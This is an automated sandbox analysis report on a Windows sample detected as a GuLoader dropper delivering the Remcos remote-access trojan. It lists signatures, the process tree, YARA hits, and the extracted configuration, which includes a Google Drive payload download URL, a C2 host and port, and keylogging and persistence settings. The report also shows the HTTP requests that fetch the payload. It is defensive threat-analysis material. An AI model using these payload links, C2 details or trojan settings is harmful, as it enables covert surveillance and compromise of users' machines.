Edit tour

Windows Analysis Report
Over Prime.exe

Overview

General Information

Sample Name:	Over Prime.exe
Analysis ID:	636171
MD5:	96f33f92c952c6d74c07974f375f81ee
SHA1:	bb5ef9a71160c8cd20791ec1a4bfdc21c7a30f00
SHA256:	358108556d528dcc244ad0ade4e553a072d6e6e0a917cf51cf1bfe7a20c1d2e9
Infos:

Detection

GuLoader, Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Remcos RAT

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Installs a global keyboard hook

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality for execution timing, often used to detect debuggers

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Checks if the current process is being debugged

PE file contains more sections than normal

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

Over Prime.exe (PID: 8260 cmdline: "C:\Users\user\Desktop\Over Prime.exe" MD5: 96F33F92C952C6D74C07974F375F81EE)

Over Prime.exe (PID: 396 cmdline: "C:\Users\user\Desktop\Over Prime.exe" MD5: 96F33F92C952C6D74C07974F375F81EE)

wscript.exe (PID: 4848 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs" MD5: 4D780D8F77047EE1C65F747D9F63A1FE)

cmd.exe (PID: 1660 cmdline: C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Roaming\wqs.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

wqs.exe (PID: 1752 cmdline: C:\Users\user\AppData\Roaming\wqs.exe MD5: 96F33F92C952C6D74C07974F375F81EE)

WerFault.exe (PID: 9084 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 1028 MD5: 40A149513D721F096DDF50C04DA2F01F)

wqs.exe (PID: 4356 cmdline: "C:\Users\user\AppData\Roaming\wqs.exe" MD5: 96F33F92C952C6D74C07974F375F81EE)

wqs.exe (PID: 2540 cmdline: "C:\Users\user\AppData\Roaming\wqs.exe" MD5: 96F33F92C952C6D74C07974F375F81EE)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx"}

Threatname: Remcos

{"Host:Port:Password": "entralent200.sytes.net:2321:1", "Assigned name": "Entralent_user 3", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "wqs.exe", "Startup value": "ws", "Hide file": "Enable", "Mutex": "Remcos-G5O10D", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "", "Keylog folder": "", "Keylog file max size": "0"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_wqs.exe_5de7e7b08b3e5c86b8b02a256aa7bac32e252e_2f3aa718_a2a4a9c4-75e6-4d16-9eb5-77cfaf3dc85d\Report.wer	SUSP_WER_Suspicious_Crash_Directory	Detects a crashed application executed in a suspicious directory	Florian Roth	0x116:$a1: ReportIdentifier= 0x198:$a1: ReportIdentifier= 0x61e:$a2: .Name=Fault Module Name 0x2fea:$a3: AppPath= 0x2fea:$l4: AppPath=C:\Users\ 0x2fea:$s8: AppPath=C:\Users\user\AppData\Roaming\wqs.exe

Memory Dumps

Source	Rule	Description	Author
00000003.00000000.827206659.0000000001660000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000021.00000000.1311290809.0000000001660000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000014.00000002.1500240670.0000000002C30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000003.00000002.977479110.00000000018CB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Over Prime.exe PID: 396	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: wqs.exe PID: 2540	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 4 entries

HTTP traffic detected: HTTP/1.1 403 ForbiddenX-GUploader-UploadID: ADPycduwc9a0y_kTiYLXFvp25BR7xAbtijbZpn2hg4Hk-rSx8YpgO-TpqITrSn2xcl6_T1no0LL12Nqi3dmRCmV1c0mIljAnpC95Access-Control-Allow-Origin: *Access-Control-Allow-Credentials: falseAccess-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: Over Prime.exe, 00000003.00000003.967952914.00000000018DD000.00000004.00000020.00020000.00000000.sdmp, Over Prime.exe, 00000003.00000003.963823031.00000000018E2000.00000004.00000020.00020000.00000000.sdmp, Over Prime.exe, 00000003.00000002.977479110.00000000018CB000.00000004.00000020.00020000.00000000.sdmp, Over Prime.exe, 00000003.00000003.963257542.00000000018E2000.00000004.00000020.00020000.00000000.sdmp, wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Over Prime.exe, 00000003.00000003.967952914.00000000018DD000.00000004.00000020.00020000.00000000.sdmp, Over Prime.exe, 00000003.00000003.963823031.00000000018E2000.00000004.00000020.00020000.00000000.sdmp, Over Prime.exe, 00000003.00000002.977479110.00000000018CB000.00000004.00000020.00020000.00000000.sdmp, Over Prime.exe, 00000003.00000003.963257542.00000000018E2000.00000004.00000020.00020000.00000000.sdmp, wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Over Prime.exe, 00000003.00000001.830296323.0000000000649000.00000008.00000001.01000000.00000006.sdmp, wqs.exe, 00000021.00000001.1315961931.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: Over Prime.exe, wqs.exe.3.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Amcache.hve.14.dr	String found in binary or memory: http://upx.sf.net
Source: Over Prime.exe, 00000003.00000001.830296323.0000000000649000.00000008.00000001.01000000.00000006.sdmp, wqs.exe, 00000021.00000001.1315961931.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: Over Prime.exe, 00000003.00000001.830139550.0000000000626000.00000008.00000001.01000000.00000006.sdmp, wqs.exe, 00000021.00000001.1315762742.0000000000626000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: Over Prime.exe, 00000003.00000001.829854914.00000000005F2000.00000008.00000001.01000000.00000006.sdmp, wqs.exe, 00000021.00000001.1315487546.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Over Prime.exe, 00000003.00000001.829854914.00000000005F2000.00000008.00000001.01000000.00000006.sdmp, wqs.exe, 00000021.00000001.1315487546.00000000005F2000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: Over Prime.exe, 00000003.00000003.967952914.00000000018DD000.00000004.00000020.00020000.00000000.sdmp, Over Prime.exe, 00000003.00000002.977256997.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, wqs.exe, 00000021.00000002.5716810220.0000000001910000.00000004.00000020.00020000.00000000.sdmp, wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, wqs.exe, 00000021.00000003.1474693072.0000000001910000.00000004.00000020.00020000.00000000.sdmp, wqs.exe, 00000021.00000003.1464487636.0000000001910000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0g-2k-docs.googleusercontent.com/
Source: Over Prime.exe, 00000003.00000002.977256997.00000000018A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0g-2k-docs.googleusercontent.com/$
Source: Over Prime.exe, 00000003.00000003.968299753.0000000001925000.00000004.00000020.00020000.00000000.sdmp, Over Prime.exe, 00000003.00000002.977966120.0000000001925000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0g-2k-docs.googleusercontent.com/%%doc-0g-2k-docs.googleusercontent.com
Source: wqs.exe, 00000021.00000003.1464487636.0000000001910000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-0g-2k-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3efh5oi2
Source: wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: wqs.exe, 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/ertificates
Source: Over Prime.exe, 00000003.00000002.978427777.0000000003311000.00000004.00000800.00020000.00000000.sdmp, wqs.exe, 00000021.00000002.5714798274.0000000001858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx
Source: wqs.exe, 00000021.00000002.5714798274.0000000001858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjxK
Source: Over Prime.exe, 00000003.00000002.976868557.0000000001868000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjxyt
Source: Over Prime.exe, 00000003.00000001.830296323.0000000000649000.00000008.00000001.01000000.00000006.sdmp, wqs.exe, 00000021.00000001.1315961931.0000000000649000.00000020.00000001.01000000.00000006.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3efh5oi21jf0folm3d9lt695jp6ibgqc/1653914700000/00364753337067030959/*/1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-2k-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3efh5oi21jf0folm3d9lt695jp6ibgqc/1653914700000/00364753337067030959/*/1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-2k-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/3efh5oi21jf0folm3d9lt695jp6ibgqc/1653914700000/00364753337067030959/*/1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-2k-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.186.110:443 -> 192.168.11.20:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.11.20:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.110:443 -> 192.168.11.20:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.11.20:49768 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Roaming\wqs.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\wqs.exe

Jump to behavior

Source: C:\Users\user\Desktop\Over Prime.exe

Code function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056DE

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.977479110.00000000018CB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Over Prime.exe PID: 396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wqs.exe PID: 2540, type: MEMORYSTR

Source: Over Prime.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_wqs.exe_5de7e7b08b3e5c86b8b02a256aa7bac32e252e_2f3aa718_a2a4a9c4-75e6-4d16-9eb5-77cfaf3dc85d\Report.wer, type: DROPPED

Matched rule: SUSP_WER_Suspicious_Crash_Directory date = 2019-10-18, author = Florian Roth, description = Detects a crashed application executed in a suspicious directory, reference = https://twitter.com/cyb3rops/status/1185585050059976705, score =

Source: C:\Users\user\AppData\Roaming\wqs.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 1028

Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	0_2_0040352D
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 11_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	11_2_0040352D
Source: C:\Users\user\AppData\Roaming\wqs.exe	Code function: 20_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,	20_2_0040352D

Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_0040755C	0_2_0040755C
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_00406D85	0_2_00406D85
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_73B91BFF	0_2_73B91BFF
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C42AD7	0_2_02C42AD7
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C44228	0_2_02C44228
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38AC4	0_2_02C38AC4
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38AD4	0_2_02C38AD4
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38ADC	0_2_02C38ADC
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38AE4	0_2_02C38AE4
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C372EB	0_2_02C372EB
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30A80	0_2_02C30A80
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C3024A	0_2_02C3024A
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30206	0_2_02C30206
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38A04	0_2_02C38A04
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38A0C	0_2_02C38A0C
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38A14	0_2_02C38A14
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38A1C	0_2_02C38A1C
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38A24	0_2_02C38A24
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38A2C	0_2_02C38A2C
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38A34	0_2_02C38A34
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38A3C	0_2_02C38A3C
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C303D5	0_2_02C303D5
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38B88	0_2_02C38B88
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30391	0_2_02C30391
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38B90	0_2_02C38B90
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38B98	0_2_02C38B98
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30359	0_2_02C30359
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38B70	0_2_02C38B70
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38B78	0_2_02C38B78
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30322	0_2_02C30322
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C45323	0_2_02C45323
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30B32	0_2_02C30B32
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C300C4	0_2_02C300C4
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C388DE	0_2_02C388DE
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C308F8	0_2_02C308F8
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C300FD	0_2_02C300FD
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30082	0_2_02C30082
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30889	0_2_02C30889
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C35093	0_2_02C35093
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C308B9	0_2_02C308B9
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C4504C	0_2_02C4504C
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30051	0_2_02C30051
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30854	0_2_02C30854
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30002	0_2_02C30002
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30010	0_2_02C30010
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30810	0_2_02C30810
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C301C1	0_2_02C301C1
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C381C8	0_2_02C381C8
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C309CF	0_2_02C309CF
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C381D0	0_2_02C381D0
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C381D8	0_2_02C381D8
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38984	0_2_02C38984
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C3898C	0_2_02C3898C
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C381B8	0_2_02C381B8
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38964	0_2_02C38964
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C3896C	0_2_02C3896C
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38974	0_2_02C38974
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C3017A	0_2_02C3017A
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C3097C	0_2_02C3097C
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C3897C	0_2_02C3897C
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C38112	0_2_02C38112
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30132	0_2_02C30132
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30932	0_2_02C30932
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C306E0	0_2_02C306E0
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30699	0_2_02C30699
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C376A7	0_2_02C376A7
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30658	0_2_02C30658
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30618	0_2_02C30618
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C307D9	0_2_02C307D9
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C307A9	0_2_02C307A9
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C30769	0_2_02C30769
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C37728	0_2_02C37728
Source: C:\Users\user\Desktop\Over Prime.exe	Code function: 0_2_02C3072D	0_2_02C3072D
